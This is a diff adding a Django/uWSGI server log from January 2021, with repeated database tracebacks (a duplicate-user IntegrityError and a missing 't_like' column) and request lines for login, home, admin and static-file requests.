+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.IntegrityError: (1062, "Duplicate entry 'Lucy' for key 'uid'")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 245, in login
+ models.User.objects.create(uid=uid, password=pwd)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.IntegrityError: (1062, "Duplicate entry 'Lucy' for key 'uid'")
+[pid: 32185|app: 0|req: 10/22] 219.228.146.156 () {48 vars in 1009 bytes} [Thu Jan 14 07:19:10 2021] POST /login/ => generated 208125 bytes in 142 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1)
+[pid: 32185|app: 0|req: 11/23] 219.228.146.156 () {48 vars in 1009 bytes} [Thu Jan 14 07:19:16 2021] POST /login/ => generated 27 bytes in 22 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0)
+Internal Server Error: /home/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.OperationalError: (1054, "Unknown column 'app01_topic.t_like' in 'field list'")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 31, in home
+ for t in recommends:
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 287, in __iter__
+ self._fetch_all()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1308, in _fetch_all
+ self._result_cache = list(self._iterable_class(self))
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 53, in __iter__
+ results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1156, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.OperationalError: (1054, "Unknown column 'app01_topic.t_like' in 'field list'")
+[pid: 32185|app: 0|req: 12/24] 219.228.146.156 () {40 vars in 913 bytes} [Thu Jan 14 07:19:16 2021] GET /home/ => generated 183111 bytes in 96 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1)
+[pid: 32185|app: 0|req: 13/25] 219.228.146.156 () {38 vars in 865 bytes} [Thu Jan 14 07:19:22 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 32185|app: 0|req: 14/26] 219.228.146.156 () {48 vars in 1009 bytes} [Thu Jan 14 07:19:30 2021] POST /login/ => generated 27 bytes in 23 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0)
+Internal Server Error: /home/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.OperationalError: (1054, "Unknown column 'app01_topic.t_like' in 'field list'")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 31, in home
+ for t in recommends:
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 287, in __iter__
+ self._fetch_all()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1308, in _fetch_all
+ self._result_cache = list(self._iterable_class(self))
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 53, in __iter__
+ results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1156, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.OperationalError: (1054, "Unknown column 'app01_topic.t_like' in 'field list'")
+[pid: 32185|app: 0|req: 15/27] 219.228.146.156 () {40 vars in 913 bytes} [Thu Jan 14 07:19:30 2021] GET /home/ => generated 183111 bytes in 104 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1)
+[pid: 32185|app: 0|req: 16/28] 219.228.146.156 () {38 vars in 865 bytes} [Thu Jan 14 07:20:05 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 32185|app: 0|req: 17/29] 219.228.146.156 () {40 vars in 917 bytes} [Thu Jan 14 07:20:08 2021] GET /my-admin => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 0)
+[pid: 32185|app: 0|req: 18/30] 219.228.146.156 () {40 vars in 919 bytes} [Thu Jan 14 07:20:08 2021] GET /my-admin/ => generated 5366 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 32185|app: 0|req: 19/31] 219.228.146.156 () {48 vars in 1017 bytes} [Thu Jan 14 07:20:20 2021] POST /my-admin/ => generated 27 bytes in 18 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0)
+[pid: 32185|app: 0|req: 20/32] 219.228.146.156 () {40 vars in 925 bytes} [Thu Jan 14 07:20:20 2021] GET /admin-home => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 180 bytes (1 switches on core 1)
+Internal Server Error: /admin-home/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.OperationalError: (1054, "Unknown column 'app01_topic.t_like' in 'field list'")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 492, in topic_manage
+ return render(request, 'admin-home.html', response)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/shortcuts.py", line 19, in render
+ content = loader.render_to_string(template_name, context, request, using=using)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/template/loader.py", line 62, in render_to_string
+ return template.render(context, request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/template/backends/django.py", line 61, in render
+ return self.template.render(context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/template/base.py", line 170, in render
+ return self._render(context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/template/base.py", line 162, in _render
+ return self.nodelist.render(context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/template/base.py", line 938, in render
+ bit = node.render_annotated(context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/template/base.py", line 905, in render_annotated
+ return self.render(context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/template/defaulttags.py", line 168, in render
+ len_values = len(values)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 269, in __len__
+ self._fetch_all()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1308, in _fetch_all
+ self._result_cache = list(self._iterable_class(self))
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 53, in __iter__
+ results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1156, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.OperationalError: (1054, "Unknown column 'app01_topic.t_like' in 'field list'")
+[pid: 32185|app: 0|req: 21/33] 219.228.146.156 () {40 vars in 927 bytes} [Thu Jan 14 07:20:20 2021] GET /admin-home/ => generated 232495 bytes in 138 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1)
+Not Found: /
+[pid: 32185|app: 0|req: 22/34] 113.96.232.116 () {32 vars in 487 bytes} [Thu Jan 14 07:22:16 2021] GET / => generated 3429 bytes in 7 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /
+[pid: 32185|app: 0|req: 23/35] 219.228.146.146 () {36 vars in 615 bytes} [Thu Jan 14 07:22:27 2021] GET / => generated 3429 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /favicon.ico
+[pid: 32185|app: 0|req: 24/36] 219.228.146.146 () {34 vars in 526 bytes} [Thu Jan 14 07:22:30 2021] GET /favicon.ico => generated 3480 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /
+[pid: 32185|app: 0|req: 25/37] 219.228.146.146 () {36 vars in 691 bytes} [Thu Jan 14 07:23:56 2021] GET / => generated 3429 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /favicon.ico
+[pid: 32185|app: 0|req: 26/38] 219.228.146.146 () {36 vars in 637 bytes} [Thu Jan 14 07:23:56 2021] GET /favicon.ico => generated 3480 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 32185|app: 0|req: 27/39] 219.228.146.146 () {36 vars in 701 bytes} [Thu Jan 14 07:24:00 2021] GET /login => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 175 bytes (1 switches on core 0)
+[pid: 32185|app: 0|req: 28/40] 219.228.146.146 () {36 vars in 703 bytes} [Thu Jan 14 07:24:00 2021] GET /login/ => generated 6428 bytes in 3 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 32185|app: -1|req: -1/41] 219.228.146.146 () {38 vars in 726 bytes} [Thu Jan 14 07:24:00 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0)
+[pid: 32185|app: -1|req: -1/42] 219.228.146.146 () {38 vars in 748 bytes} [Thu Jan 14 07:24:00 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 32185|app: -1|req: -1/43] 219.228.146.146 () {38 vars in 730 bytes} [Thu Jan 14 07:24:00 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 32185|app: -1|req: -1/44] 219.228.146.146 () {38 vars in 728 bytes} [Thu Jan 14 07:24:00 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 32185|app: -1|req: -1/45] 219.228.146.146 () {38 vars in 734 bytes} [Thu Jan 14 07:24:00 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 32185|app: -1|req: -1/46] 219.228.146.146 () {38 vars in 709 bytes} [Thu Jan 14 07:24:00 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 32185|app: -1|req: -1/47] 219.228.146.146 () {38 vars in 707 bytes} [Thu Jan 14 07:24:00 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 32185|app: -1|req: -1/48] 219.228.146.146 () {38 vars in 725 bytes} [Thu Jan 14 07:24:00 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 32185|app: -1|req: -1/49] 219.228.146.146 () {38 vars in 723 bytes} [Thu Jan 14 07:24:00 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 32185|app: -1|req: -1/50] 219.228.146.146 () {38 vars in 715 bytes} [Thu Jan 14 07:24:00 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 32185|app: -1|req: -1/51] 219.228.146.146 () {38 vars in 780 bytes} [Thu Jan 14 07:24:03 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 32185|app: -1|req: -1/52] 219.228.146.146 () {38 vars in 754 bytes} [Thu Jan 14 07:24:03 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 32185|app: 0|req: 29/53] 219.228.146.146 () {48 vars in 925 bytes} [Thu Jan 14 07:24:06 2021] POST /login/ => generated 27 bytes in 66 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0)
+[pid: 32185|app: 0|req: 30/54] 219.228.146.146 () {40 vars in 882 bytes} [Thu Jan 14 07:24:06 2021] GET /home => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 1)
+Internal Server Error: /home/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
